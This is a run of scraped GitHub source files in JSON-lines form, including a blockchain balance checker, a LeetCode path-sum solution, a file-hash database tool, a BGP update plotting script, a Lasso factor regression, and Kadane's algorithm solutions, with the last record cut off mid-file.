id.',\n 'table': 'datasource',\n 'qtype': 'exists',\n 'sql': \"\"\"SELECT EXISTS(SELECT 1 FROM datasource WHERE id = %s)\"\"\",\n },\n 'exists_category':\n {\n 'name': 'exists',\n 'description': 'Checks existence of row in datasource table based on id.',\n 'table': 'datasource',\n 'qtype': 'exists',\n 'sql': \"\"\"SELECT EXISTS(SELECT 1 FROM datasource WHERE category = %s)\"\"\",\n },\n\n\n}\n","repo_name":"john-james-ai/nlr","sub_path":"nlr/database/sequel.py","file_name":"sequel.py","file_ext":"py","file_size_in_byte":6297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40891694037","text":"import pickle\n\nimport utils.helper\nfrom utils.helper import *\nimport sqlite3\npoolPath = 'data/pool.dat'\nclass balance:\n\n def __init__(self, connection, auth):\n self.connection = connection\n self.authUser = auth\n\n def get_current_balance(self):\n cur = self.connection.cursor()\n return cur.execute('SELECT coins FROM users where id = ?', (self.authUser,)).fetchone()\n\n def update_balance(self):\n cur = self.connection.cursor()\n cur.execute('UPDATE users SET coins = coins + 50 where id = ?', (self.authUser,))\n self.connection.commit()\n\n def get_current_balance_from_user(self, username):\n cur = self.connection.cursor()\n result = cur.execute('SELECT coins FROM users where username = ?', (username,)).fetchone()\n if result is None:\n return False\n else:\n return result\n\n def get_current_username(self, userId):\n cur = self.connection.cursor()\n result = cur.execute('SELECT username FROM users WHERE id = ?', (userId,)).fetchone()\n if result is None:\n return None\n return result\n def get_current_balance_in_pool(self):\n allTx = []\n with open(poolPath, \"rb+\") as f:\n try:\n while True:\n allTx.append(pickle.load(f))\n except EOFError:\n pass\n\n new_balance = 0\n startingBalance = self.get_current_balance()[0]\n for x in allTx:\n if x.userId[0] == self.authUser:\n amount_from_transaction = x.outputs[0][1]\n new_balance += amount_from_transaction\n return new_balance + startingBalance\n\n\n def get_user_pubc_key_by_id(self,userId):\n cur = self.connection.cursor()\n result = cur.execute('SELECT public_key FROM users WHERE id = ?', (userId,)).fetchone()\n if result is None:\n return None\n return str.encode(result[0])\n\n def calculate_the_balance_using_pool_income(self):\n alltx = get_all_transaction_in_the_pool()\n currentLoggedInPbcKey = self.get_user_pubc_key_by_id(self.authUser)\n currentbalance = 0\n for x in alltx:\n amount = x.outputs[0][1]\n pubcKey = x.outputs[0][0]\n if currentLoggedInPbcKey.decode('utf-8') == pubcKey.decode('utf-8'):\n currentbalance += amount\n return currentbalance\n\n def calculate_the_balance_using_pool_outcome(self):\n alltx = get_all_transaction_in_the_pool()\n pubc_key = self.get_user_pubc_key_by_id(self.authUser)\n currentbalance = 0\n for x in alltx:\n pubkey_x = x.inputs[0][0]\n if pubc_key.decode('utf-8') == pubkey_x.decode('utf-8'):\n outcome = x.inputs[0][1]\n currentbalance += outcome\n return currentbalance\n\n def total_balance_pool(self):\n outcome = self.calculate_the_balance_using_pool_outcome()\n income = self.calculate_the_balance_using_pool_income()\n balance = 50\n if income != outcome:\n return balance - outcome\n return None\n\n def calculate_the_balance_using_chain_outcome(self):\n allTx = get_all_tx_in_the_chain()\n if allTx is None:\n return \"Chain is empty\"\n else:\n pubc_key = self.get_user_pubc_key_by_id(self.authUser)\n balanceChain = 0\n for x in allTx:\n pubc_keyX = x.inputs[0][0]\n if pubc_key.decode('UTF-8') == pubc_keyX.decode('utf-8'):\n uitgave = x.inputs[0][1]\n balanceChain += uitgave\n return balanceChain\n\n def calculate_the_balance_using_chain_income(self):\n alltx = get_all_tx_in_the_chain()\n if alltx is None:\n return \"Chain is empty\"\n else:\n pubc_key = self.get_user_pubc_key_by_id(self.authUser)\n balanceChain = 0\n for x in alltx:\n amount = x.outputs[0][1]\n pubcKey = x.outputs[0][0]\n if pubc_key.decode('utf-8') == pubcKey.decode('utf-8'):\n balanceChain += amount\n return balanceChain\n\n def total_balance_chain(self):\n income = self.calculate_the_balance_using_chain_income()\n outcome = self.calculate_the_balance_using_chain_outcome()\n balance = 50\n if income != outcome:\n return (balance - outcome) + income\n return None\n def current_balance(self):\n if self.total_balance_pool() is not None and self.total_balance_chain() is not None:\n return self.total_balance_pool() + self.total_balance_chain()\n elif self.total_balance_pool() is not None:\n return self.total_balance_pool()\n elif self.total_balance_chain() is not None:\n return self.total_balance_chain()\n return 50\n","repo_name":"Darrensiriram/goodchain","sub_path":"actions/check_balance.py","file_name":"check_balance.py","file_ext":"py","file_size_in_byte":4888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7878919330","text":"from dsa import *\n\ndef hasPathSum(self, root: Optional[TreeNode], targetSum: int) -> bool:\n # if there is no root, then it's impossible to find the targetSum\n if root is None:\n return False\n\n # initialize the base result to False\n hasSum = False\n\n # we perform dfs until we reach a leaf node then we see if we matched the targetSum for each leaf node\n def dfs(u,s=0):\n\n nonlocal hasSum\n \n # we will stop traversing if we already found the targetSum\n if hasSum == True:\n return\n\n # if we are on a leaf node, check if we found the targetSum\n if u.right is None and u.left is None:\n if (s+u.val) == targetSum:\n hasSum = True\n return\n \n # traverse binary tree\n if u.right:\n dfs(u.right,s+u.val)\n if u.left:\n dfs(u.left,s+u.val)\n\n dfs(root)\n return hasSum\n\n\n","repo_name":"mmvergara/mmv-dsa","sub_path":"leetcode/explained/112.py","file_name":"112.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"36762791596","text":"#!/usr/bin/python3\n\n# ## {R2D2919B742E} ##\n# ###########################################################################\n# What if magic existed?\n# What if a place existed where your every thought and dream come to life.\n# There is only one catch: it has to be written down.\n# Such a place exists, it is called programming.\n# - Scott Taylor Reph, RightThumb.com\n# ###########################################################################\n# ## {C3P0D40fAe8B} ##\n\n# import os\n# import sys\n# import simplejson as json\n# import shutil\n\nimport _rightThumb._base1 as _\nimport _rightThumb._vars as _v\nimport _rightThumb._string as _str\n\nimport sqlite3\n\n\nimport sys\nimport hashlib\n\nimport os\n\n\n_.switches.register('Database', '-db,-database','%i%/C_Drive.db')\n_.switches.register('MD5', '-md5')\n\n# _.switches.register('Input', '-i','appIn.py')\n# _.switches.register('Output', '-o','folder\\\\appOut.py')\n# _.switches.register('Move', '-move','completed_in-folder_name')\n\n_.appInfo= {\n\t'file': 'dirDBMD5.py',\n\t'description': 'Changes the world',\n\t'prerequisite': [],\n\t'examples': [],\n\t'columns': [],\n\t}\n\n_.appInfo['examples'].append('p dirDBMD5 -database defaultDir.db')\n_.appInfo['examples'].append('')\n_.appInfo['examples'].append('p dirDBMD5 -db %i%/C_Drive.db -c name')\n_.appInfo['examples'].append('')\n_.appInfo['examples'].append('p dirdbmd5 -db test_MD5.db')\n_.appInfo['examples'].append('')\n\n\n\n\n\n\n\n\n\n_.appInfo['columns'].append({'name': 'name', 'abbreviation': 'n'})\n_.appInfo['columns'].append({'name': 'path', 'abbreviation': 'p'})\n_.appInfo['columns'].append({'name': 'folder', 'abbreviation': 'f'})\n_.appInfo['columns'].append({'name': 'bytes', 'abbreviation': 'b'})\n\n_.appInfo['columns'].append({'name': 'date_modified_raw', 'abbreviation': 'dmr,mdr'})\n_.appInfo['columns'].append({'name': 'date_created_raw', 'abbreviation': 'dcr,cdr'})\n\n_.appInfo['columns'].append({'name': 'md5', 'abbreviation': 'md5'})\n\n# stat\n# typesort\n\ndef formatColumns(columns):\n\tresult = ''\n\tfor c in columns.split(','):\n\t\tfor col in _.appInfo['columns']:\n\t\t\tfor a in col['abbreviation'].split(','):\n\t\t\t\tif a == c:\n\t\t\t\t\tc = col['name']\n\t\tresult += c + ','\n\tresult = result[:-1]\n\treturn result\n\n_.switches.trigger('Column',formatColumns)\n\n\n\n_.switches.process()\n\n\n# timestamp \n# echo %now% > %tmpf2%\n# type %tmpf1% | p line -make \" md5.py ;'{};' >> ;'%tmpf2%;'\" | p execute\n# timestamp\n# echo %now% >> %tmpf2%\n# done\n\n\n\n\n# pipeData = ''\n\n# if not sys.stdin.isatty():\n# pipeData = sys.stdin.readlines()\n# try:\n# if pipeData[0][0].isalnum() == False:\n# pipeData[0] = pipeData[0][1:]\n# except Exception as e:\n# pass\n\n########################################################################################\ndef md5(fname):\n\thash_md5 = hashlib.md5()\n\twith open(fname, \"rb\") as f:\n\t\tfor chunk in iter(lambda: f.read(4096), b\"\"):\n\t\t\thash_md5.update(chunk)\n\treturn hash_md5.hexdigest()\n\treturn hash_md5.hexdigest()\n\n\ndef formatSize(size):\n\tsize = int(size)\n\tresult = ''\n\tif size == None:\n\t\tresult = ''\n\telif size < 1024:\n\t\tresult = str(size) + ' B'\n\telif size > 1024 and size < 1048576:\n\t\tnum = round(size / 1024, 2)\n\t\tresult = str(num) + ' KB'\n\telif size > 1048576 and size < 1073741824:\n\t\tnum = round(size / 1048576, 2)\n\t\tresult = str(num) + ' MB'\n\telif size > 1073741824 and size < 1099511627776 :\n\t\tnum = round(size / 1073741824, 2)\n\t\tresult = str(num) + ' GB'\n\telse:\n\t\tnum = round(size / 1099511627776, 2)\n\t\tresult = str(num) + ' TB'\n\t# if size < 1:\n\t# result = ''\n\treturn result\n\n\ndef action():\n\tif _.switches.isActive('Database'):\n\t\tif len(_.switches.value('Database')) > 1:\n\t\t\tdatabaseFile = _.switches.value('Database')\n\t\telse:\n\t\t\tdatabaseFile = \"defaultDir.db\"\n\n\t\t# print(databaseFile)\n\t\t# print(databaseFile)\n\t\tconn = sqlite3.connect(databaseFile)\n\t\tc = conn.cursor()\n\t\t# sql = \"SELECT bytes,path FROM files WHERE path like '%0%'\"\n\t\tsql = \"SELECT * FROM md5 ORDER BY bytes\"\n\t\t# sql = \"SELECT bytes,path FROM files WHERE bytes < 101 and bytes > 49 ORDER BY bytes\"\n\t\t# sql = \"SELECT bytes,path FROM files WHERE bytes < 10000000 and bytes > 200 ORDER BY bytes\"\n\t\t# sql = \"SELECT bytes,path FROM files WHERE bytes > 100000000\"\n\t\tc.execute(sql)\n\t\t# c.execute('SELECT * FROM {tn} WHERE {cn} = {st}'.\\\n\t\t# format(tn='files', cn='path', st='s'))\n\t\tall_rows = c.fetchall()\n\t\t# print('1):', all_rows)\n\t\tnames = action2()\n\t\t# print(len(all_rows))\n\t\trows = []\n\t\tprint(len(all_rows))\n\t\tsys.exit()\n\t\tfor f in all_rows:\n\t\t\t# print(f)\n\t\t\t# print(_.switches.value('Column'))\n\n\t\t\trow = {}\n\t\t\tfor i,n in enumerate(names):\n\t\t\t\trow[n] = f[i]\n\t\t\tif _.switches.isActive('Column'):\n\t\t\t\tline = ''\n\t\t\t\tcol = _.switches.value('Column')\n\t\t\t\tfor c in col.split(','):\n\t\t\t\t\tline += str(row[c]) + str('\\t')\n\t\t\t\tprint(line)\n\t\t\telse:\n\t\t\t\trows.append({'md5': row['md5'], 'bytes': formatSize(row['bytes']), 'name': row['name'], })\n\t\t\t\t# print(row['md5'],formatSize(row['bytes']),'\\t',row['name'])\n\n\t\tif not _.switches.isActive('Column'):\n\t\t\t_.tables.register('Auto',rows)\n\t\t\t_.tables.print('Auto','md5,bytes,name')\n\n\t\t\t# if _.switches.value('Column') == 'name' or _.switches.value('Column') == 'n':\n\t\t\t# print(f[1])\n\t\t\t# else:\n\t\t\t# print(formatSize(f[0]),'\\t',f[1])\n\ndef action2():\n\tif _.switches.isActive('Database'):\n\t\tif len(_.switches.value('Database')) > 1:\n\t\t\tdatabaseFile = _.switches.value('Database')\n\t\telse:\n\t\t\tdatabaseFile = \"defaultDir.db\"\n\tconnection = sqlite3.connect(databaseFile)\n\tconnection.row_factory = sqlite3.Row\n\tcursor = connection.execute('select * from md5')\n\trow = cursor.fetchone()\n\tnames = row.keys()\n\t# print(names)\n\n\t# for n in names:\n\t\t# print(n)\n\t\n\treturn names\ndef action3():\n\tif _.switches.isActive('Database'):\n\t\tif len(_.switches.value('Database')) > 1:\n\t\t\tdatabaseFile = _.switches.value('Database')\n\t\telse:\n\t\t\tdatabaseFile = \"defaultDir.db\"\n\t\tcon = sqlite3.connect(databaseFile)\n\t\twith open('dump.sql', 'w') as f:\n\t\t\tfor line in con.iterdump():\n\t\t\t\tf.write('%s\\n' % line)\n########################################################################################\nif __name__ == '__main__':\n\taction()\n\t# print(action2())\n\n\n\n\n\n","repo_name":"rightthumb/rightthumb-widgets-v0","sub_path":"widgets/python/dirDBMD5.py","file_name":"dirDBMD5.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"20048732195","text":"#! /usr/bin/env python3\n\nimport sys\nimport matplotlib.pyplot as plt\n\ndef help():\n print('USAGE: graph.py FILESET INTERVALS [DATA_LEN]')\n print('Plot graphs with the number of received UPDATEs, UPDATEs per peer and the announced/withdrawn prefixes per peer.')\n print('')\n print('FILESET Path to file containing the filenames of the set of pcaps which should be analyzed. Each of this files has to contain packets of 1 hour. They have to be listed in the dataset in correct timeorder.')\n print(' Use for example tshark to parse the pcap:')\n print(' $ tshark -r trafficdump.pcap -M 1 -T fields -e _ws.col.Time -e ip.src -e bgp.nlri_prefix -e bgp.withdrawn_prefix -E separator=\";\" bgp.type==2 > parsed.csv')\n print('INTERVALS Interval (in seconds) for which received UPDATE messages should be grouped together for plotting in the graph. Comma separated list to plot multiple intervals.')\n print('DATA_LEN Time in seconds every single file in the dataset represents. Default: 3600')\n\ndef avg(data):\n if len(data) == 0:\n return 0\n else:\n return sum(data) / len(data)\n\ndef calc(interval_length, dataset_len):\n cur_interval_start = 0\n cur_interval = 1\n cur_interval_data = {\n # \"neighbor\": {'msg': 0, 'announced': 0, 'withdrawn': 0},\n }\n\n plt_intervals = []\n plt_total_msg = []\n plt_avg_msg_per_peer = []\n plt_avg_announced_per_peer = []\n plt_avg_withdrawn_per_peer = []\n max_announced = 0\n max_withdrawn = 0\n\n peerset = set()\n\n datafile_num = 0\n with open(sys.argv[1], 'r') as fileset:\n files = []\n for loadfile in fileset:\n files.append(loadfile.rstrip(\"\\n\"))\n for loadfile in files:\n with open(loadfile, 'r') as datafile:\n for line in datafile:\n # TIME;SRC;ANNOUNCE_LIST;WITHDRAW_LIST\n data = line.rstrip(\"\\n\").split(';')\n try:\n time = float(data[0]) + datafile_num * dataset_len\n src = data[1]\n announced_pfx = [] if data[2] == '' else data[2].split(\",\")\n withdrawn_pfx = [] if data[3] == '' else data[3].split(\",\")\n except Exception as e:\n print('ABORT!')\n print('Was not able to parse this line:')\n print(line)\n print('')\n print(e)\n sys.exit(1)\n\n if time > cur_interval_start + interval_length:\n # packet is in new interval. calculate current interval…\n msg_count = 0\n avg_msg = []\n avg_announced = []\n avg_withdrawn = []\n for neigh in cur_interval_data:\n peerset.add(neigh)\n d = cur_interval_data[neigh]\n msg_count += d['msg']\n avg_msg.append(d['msg'])\n avg_announced.append(d['announced'])\n avg_withdrawn.append(d['withdrawn'])\n max_announced = max(max_announced, d['announced'])\n max_withdrawn = max(max_withdrawn, d['withdrawn'])\n\n plt_intervals.append(cur_interval)\n plt_total_msg.append(msg_count)\n plt_avg_msg_per_peer.append(avg(avg_msg))\n plt_avg_announced_per_peer.append(avg(avg_announced))\n plt_avg_withdrawn_per_peer.append(avg(avg_withdrawn))\n\n # …and start next interval\n print(f\"[file {datafile_num+1}/{len(files)}] parsed interval {cur_interval} (processed {cur_interval*interval_length} seconds)\", end=\"\\r\")\n cur_interval_start += interval_length\n cur_interval += 1\n cur_interval_data = {}\n\n # add data to interval\n if src not in cur_interval_data.keys():\n cur_interval_data[src] = {'msg': 0, 'announced': 0, 'withdrawn': 0}\n cur_interval_data[src]['msg'] += 1\n cur_interval_data[src]['announced'] += len(announced_pfx)\n cur_interval_data[src]['withdrawn'] += len(withdrawn_pfx)\n\n del line\n del data\n del time\n del src\n del announced_pfx\n del withdrawn_pfx\n datafile_num += 1\n print(\"\")\n print(\"creating graphs...\")\n\n # get data ranges for withdraw/announce/msg\n plt_times = [i*interval_length for i in plt_intervals]\n\n print(f\"number of peers: {len(peerset)}\")\n print(f\"max announced/peer/interval: {max_announced}\")\n print(f\"max withdrawn/peer/interval: {max_withdrawn}\")\n\n return (plt_times, plt_total_msg, plt_avg_msg_per_peer, plt_avg_announced_per_peer, plt_avg_withdrawn_per_peer)\n\nif len(sys.argv) < 2:\n help()\n sys.exit(1)\n\nif len(sys.argv) >= 4:\n dataset_len = int(sys.argv[3])\nelse:\n dataset_len = 3600\n\ninterval_data = []\ninterval_lengths = sys.argv[2].split(\",\")\n\nplt_min = float('inf')\nplt_max = 0\nfor i in interval_lengths:\n subdata = calc(int(i), dataset_len)\n interval_data.append(subdata)\n subplt_min = min([*subdata[1], *subdata[2], *subdata[3], *subdata[4]])\n subplt_max = max([*subdata[1], *subdata[2], *subdata[3], *subdata[4]])\n plt_min = min(plt_min, subplt_min)\n plt_max = max(plt_max, subplt_max)\n\ndatarange = [plt_min-100, plt_max+100]\nif datarange[0] < 1:\n datarange[0] = 1\n\n# now plot the data\ncm = 1/2.54\n#fig = plt.figure(figsize=(17*cm, 29*cm))\n#plt.subplots_adjust(hspace=0.5)\n\nmarkers = [\"b.\", \"gx\", \"rs\", \"k*\", \"b2\", \"gp\"]\n\n#plt.subplot(411)\nprint(\"Showing: total_msg\")\nfig = plt.figure(figsize=(20*cm, 7*cm))\nfor i, data in enumerate(interval_data):\n plt.plot(data[0], data[1], markers[i%6], label=f\"{interval_lengths[i]}s intervals\") # x:plt_times y:plt_total_msg\nplt.ylabel('Total number\\nof UPDATEs [#]')\nplt.xlabel(f\"Time [s]\")\nplt.yscale(\"log\")\nplt.legend(loc=\"upper center\", bbox_to_anchor=(0.5, 1.2), ncol=3)\nplt.ylim(datarange)\nplt.tight_layout()\nplt.show()\n\n#plt.subplot(412)\nprint(\"Showing: avg_msg_per_peer\")\nfig = plt.figure(figsize=(20*cm, 7*cm))\nfor i, data in enumerate(interval_data):\n plt.plot(data[0], data[2], markers[i%6], label=f\"{interval_lengths[i]}s intervals\") # x:plt_times y:plt_avg_msg_per_peer\nplt.ylabel('Average UPDATEs\\nper peer [#]')\nplt.xlabel(f\"Time [s]\")\nplt.yscale(\"log\")\nplt.legend(loc=\"upper center\", bbox_to_anchor=(0.5, 1.2), ncol=3)\nplt.ylim(datarange)\nplt.tight_layout()\nplt.show()\n\n#plt.subplot(413)\nprint(\"Showing: avg_announced_per_peer\")\nfig = plt.figure(figsize=(20*cm, 7*cm))\nfor i, data in enumerate(interval_data):\n plt.plot(data[0], data[3], markers[i%6], label=f\"{interval_lengths[i]}s intervals\") # x:plt_times y:plt_avg_announced_per_peer\nplt.ylabel('Average announced\\nprefixes/peer [#]')\nplt.xlabel(f\"Time [s]\")\nplt.yscale(\"log\")\nplt.legend(loc=\"upper center\", bbox_to_anchor=(0.5, 1.2), ncol=3)\nplt.ylim(datarange)\nplt.tight_layout()\nplt.show()\n\n#plt.subplot(414)\nprint(\"Showing: avg_withdrawn_per_peer\")\nfig = plt.figure(figsize=(20*cm, 7*cm))\nfor i, data in enumerate(interval_data):\n plt.plot(data[0], data[4], markers[i%6], label=f\"{interval_lengths[i]}s intervals\") # x:plt_times y:plt_avg_withdrawn_per_peer\nplt.ylabel('Average withdrawn\\nprefixes/peer [#]')\nplt.xlabel(f\"Time [s]\")\nplt.yscale(\"log\")\nplt.legend(loc=\"upper center\", bbox_to_anchor=(0.5, 1.2), ncol=3)\nplt.ylim(datarange)\nplt.tight_layout()\nplt.show()\n","repo_name":"marcelb98/da-tools","sub_path":"update_counter/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":7821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11570704884","text":"from dfply import *\nimport pandas as pd\nimport os\nimport datetime\nfrom sklearn import linear_model\nimport time\nfrom multiprocessing import Pool\nfrom functools import partial\nfrom sklearn.metrics import mean_squared_error\nimport matplotlib.pyplot as plt\nfrom collections import Counter\nos.chdir(r\"c:\\Users\\ChonWai\\Desktop\\machine learning\\data\")\n\n\ndef end_of_month(any_day):\n next_month = any_day.replace(day=28) + datetime.timedelta(days=4) # this will never fail\n return next_month - datetime.timedelta(days=next_month.day)\n\n\ndef lasso(permno, msf, x_train, x_test):\n \"\"\"\n perfrom a lasso regression\n :param permno:\n :param msf:\n :param x_train:\n :param x_test:\n :return: a dict which contail the following in order: predict return, alpha that use in the model, coeficient of all\n x variable\n \"\"\"\n training_y = msf >> mask(X.date <= '2008-01-31', X.permno == permno) >> select(X.ret)\n testing_y = msf >> mask(X.date > '2008-01-31', X.permno == permno) >> select(X.ret)\n lasso_reg = linear_model.Lasso()\n alphas = np.logspace(-10, -1, 10)\n # try to find the best r square by trying different alpha\n r_square_list = [lasso_reg.set_params(alpha=alpha).fit(x_train, training_y).score(x_test, testing_y)\n for alpha in alphas]\n lasso_reg.set_params(alpha=alphas[r_square_list.index(max(r_square_list))])\n lasso_reg.fit(x_train, training_y)\n in_sample_mse = mean_squared_error(training_y, lasso_reg.predict(x_train))\n out_sample_mse = mean_squared_error(testing_y, lasso_reg.predict(x_test))\n return {\"permno\": str(permno), \"pred_y\": lasso_reg.predict(x_test), \"alpha\": lasso_reg.alpha,\n \"coef\": lasso_reg.coef_, \"in_sample_mse\": in_sample_mse, \"out_sample_mse\": out_sample_mse}\n\n\nif __name__ == '__main__':\n start_time = time.time()\n ff5 = pd.read_csv(\"Fama French 5 Factors.CSV\", skiprows=2)\n ps = pd.read_csv(\"Pastor Stambaugh Factors.csv\")\n hxz = pd.read_excel(\"HXZ q-Factors (monthly 1967 to 2014).xlsx\")\n msf = pd.read_csv(\"cleaned_data.csv\")\n # renaming the columns\n ff5.rename(columns={\"Unnamed: 0\": \"date\", \"Mkt-RF\": \"mkt_rf\", \"SMB\": \"smb\", \"HML\": \"hml\", \"RMW\": \"rmw\", \"CMA\": \"cma\",\n \"RF\": \"rf\"}, inplace=True)\n\n # seperating the monthly data and the annual data from ff5 csv\n monthly_ff5 = ff5.iloc[: ff5.index[ff5.date == ' Annual Factors: January-December '].tolist()[0]]\n monthly_ff5[\"date\"] = pd.to_datetime(monthly_ff5[\"date\"], format='%Y%m')\n monthly_ff5.date = monthly_ff5.date.apply(end_of_month)\n monthly_ff5 = monthly_ff5.astype({\"mkt_rf\": float, \"smb\": float, \"hml\": float, \"rmw\": float, \"cma\": float, \"rf\": float})\n annual_ff5 = ff5.loc[ff5.index[ff5.date == ' Annual Factors: January-December '].tolist()[0] + 2:]\n annual_ff5.date = [date.strip() for date in annual_ff5.date]\n annual_ff5 = annual_ff5.astype({\"mkt_rf\": float, \"smb\": float, \"hml\": float, \"rmw\": float, \"cma\": float, \"rf\": float})\n hxz.rename(columns={\"Year\": \"year\", \"Month\": \"month\", \"MKT\": \"mkt\", \"ME\": \"me\", \"I/A\": \"i/a\", \"ROE\": \"roe\"},\n inplace=True)\n hxz.insert(0, \"date\", pd.to_datetime(hxz[[\"year\", \"month\"]].assign(Day=1)))\n hxz.date = hxz.date.apply(end_of_month)\n ps.rename(columns={\"DATE\": \"date\", \"PS_LEVEL\": \"ps_level\", \"PS_INNOV\": \"ps_innov\", \"PS_VWF\": \"ps_vwf\"},\n inplace=True)\n ps.date = pd.to_datetime(ps.date, format=\"%Y%m%d\").apply(end_of_month)\n msf.pop(\"index\")\n msf.insert(0, \"date\", pd.to_datetime(msf[\"time_stamp\"], format=\"%Y%m%d\"))\n msf.date.apply(end_of_month)\n msf.pop(\"time_stamp\")\n msf.rename(columns={\"stock_id\": \"permno\", \"price\": \"prc\", \"return\": \"ret\"}, inplace=True)\n all_factor = pd.merge(ps, monthly_ff5, how=\"outer\", on=\"date\")\n all_factor = pd.merge(all_factor, hxz, how=\"outer\", on=\"date\")\n # drop out irrevlent factors\n all_factor = all_factor.drop([\"mkt\", \"year\", \"month\"], axis=1)\n all_factor >> arrange(X.date)\n for lag_month in range(6):\n for factor in ['ps_level', 'ps_innov', 'ps_vwf', 'mkt_rf', 'smb', 'hml', 'rmw', 'cma', 'rf', 'me', 'i/a',\n 'roe']:\n all_factor[factor + \"_lag\" + str(lag_month + 1)] = all_factor[factor].shift(lag_month + 1)\n # Lasso regression\n # seperating the training set and the testing set\n # Given that the msf start at 1989, thus the training set is began from 1989-01-31 to 2008-01-31\n # and end with 2012-12-31\n training_x = all_factor.dropna().query(\"date >= '1989' & date <= '2008-01-31'\")[all_factor.columns[1:]]\n testing_x = all_factor.dropna().query(\"date > '2008-01-31' & date <= '2012-12-31' \")[all_factor.columns[1:]]\n permno_list = list(set(msf.permno))\n p = Pool(processes=7)\n result = list(map(partial(lasso, msf=msf, x_train=training_x, x_test=testing_x), permno_list))\n p.close()\n pred_y_list = []\n alpha_list = []\n coef_list = []\n in_sample_error_list = []\n out_sample_error_list = []\n for dictionary in result:\n pred_y_list.append(dictionary[\"pred_y\"].tolist())\n alpha_list.append(dictionary[\"alpha\"])\n coef_list.append(dictionary[\"coef\"].tolist())\n in_sample_error_list.append(dictionary[\"in_sample_mse\"])\n out_sample_error_list.append(dictionary[\"out_sample_mse\"])\n x = [str(permno) for permno in permno_list]\n y_in_sample = in_sample_error_list\n y_out_sample = out_sample_error_list\n ax1 = plt.subplot(1, 1, 1)\n postion_x = np.arange(len(permno_list))\n width = 0.3\n plt.xticks(postion_x + width / 2, x, rotation='vertical')\n in_sample_bar = ax1.bar(postion_x, y_in_sample, width=0.3, color=\"blue\")\n ax2 = ax1.twinx()\n out_sample_bar = ax2.bar(postion_x + 0.3, y_out_sample, width=0.3, color=\"red\")\n plt.legend([in_sample_bar, out_sample_bar], [\"In Sample MSE\", \"Out Sample MSE\"])\n plt.ylabel(\"MSE\", fontdict={\"fontweight\": \"bold\"})\n plt.xlabel(\"Permno\", fontdict={\"fontweight\": \"bold\"})\n plt.title(\"In Sample and out sample MSE comparsion\",\n fontdict={\"fontstyle\": \"italic\", \"fontweight\": \"bold\"})\n plt.show()\n plt.close()\n # The in sample and out of sample prediction error\n print(\"average in sample error of all assets:\")\n print(np.average(y_in_sample))\n print(\"average out sample error of all assets:\")\n print(np.average(y_out_sample))\n # plot the factors selection frequency for all sample\n factors = []\n for permno_coef in coef_list:\n permno_factor = [all_factor.columns[1:][permno_coef.index(coef)] for coef in permno_coef if coef > 0]\n factors.extend(permno_factor)\n factors_freq = Counter(factors)\n factors_freq = pd.Series(factors_freq)\n x_factor = factors_freq.index.tolist()\n y_factor_freq = factors_freq.values.tolist()\n y_factor_freq.sort(reverse=True)\n postion_x_factor = np.arange(len(x_factor))\n width = 0.3\n plt.xticks(postion_x_factor, x_factor, rotation='vertical')\n freq_bar = plt.bar(postion_x_factor, y_factor_freq, width=0.3, color=\"blue\")\n plt.legend(freq_bar, [\"Factors Frequency\"])\n plt.ylabel(\"Frequency\", fontdict={\"fontweight\": \"bold\"})\n plt.xlabel(\"Factors\", fontdict={\"fontweight\": \"bold\"})\n plt.title(\"Factors Selection Frequency \",\n fontdict={\"fontstyle\": \"italic\", \"fontweight\": \"bold\"})\n plt.show()\n plt.close()\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Sherry2Wei/ML_pset1","sub_path":"hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":7427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9182573904","text":"from PIL import Image\nimport numpy as np\nfrom settings import IMAGE_SIZE\n\n\ndef preprocess_image(fp):\n im = Image.open(fp)\n im = im.convert('RGB')\n side = min(im.size)\n x = (im.width - side) / 2\n y = (im.height - side) / 2\n square = (x, y) + (side,) * 2\n im = im.crop(square)\n im = im.resize(IMAGE_SIZE, resample=Image.BILINEAR)\n data = np.array(im.getdata())\n data = data.reshape(im.size + (3,))\n data = data / 255.0\n return data\n","repo_name":"sheuvi21/simple-convnet","sub_path":"tools/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7957303200","text":"def find_max(nums: List[int]) -> int:\n local_max = global_max = nums[0]\n for num in nums[1:]:\n local_max = max(num, local_max + num)\n global_max = max(global_max, local_max)\n return global_max\n\n\nclass Solution: # greedy # Kadane's algorithm # O(n) time 0(1) space\n def maxSubarraySumCircular(self, A: List[int]) -> int:\n positive = find_max(A)\n negative = find_max([-num for num in A]) + sum(A)\n\n if negative and negative > positive:\n return negative\n return positive\n\n\nclass Solution2:\n # greedy # Kadane's algorithm # O(1n) time 0(1) space\n def maxSubarraySumCircular(self, A: List[int]) -> int:\n local_max = global_max = local_min = global_min = accum = A[0]\n for num in A[1:]:\n local_max = max(num, local_max + num)\n global_max = max(local_max, global_max)\n\n local_min = min(num, local_min + num)\n global_min = min(local_min, global_min)\n\n accum += num\n\n return max((accum - global_min) or global_max, global_max)\n","repo_name":"aBulgakoff/algos","sub_path":"leetcode/dp_n_greedy/918_max_sum_circular_subarr.py","file_name":"918_max_sum_circular_subarr.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71405435619","text":"import pandas as pd\n\nfrom pendulum import from_format, today\nfrom datetime import datetime\nfrom time import sleep\nfrom urllib.parse import urlencode\nfrom urllib.request import Request, urlopen\n\n\nPERIOD = 7\nFINAM_URL = 'http://export.finam.ru/'\nMARKET = 1\nAPPLY = 0\nDTF = 1\nTMF = 1\nMSOR = 0\nMSTIME = 'on'\nMSTIMEVER = 1\nSEP = 1\nSEP2 = 1\nDATF = 1\nAT = 0\n\n\nclass 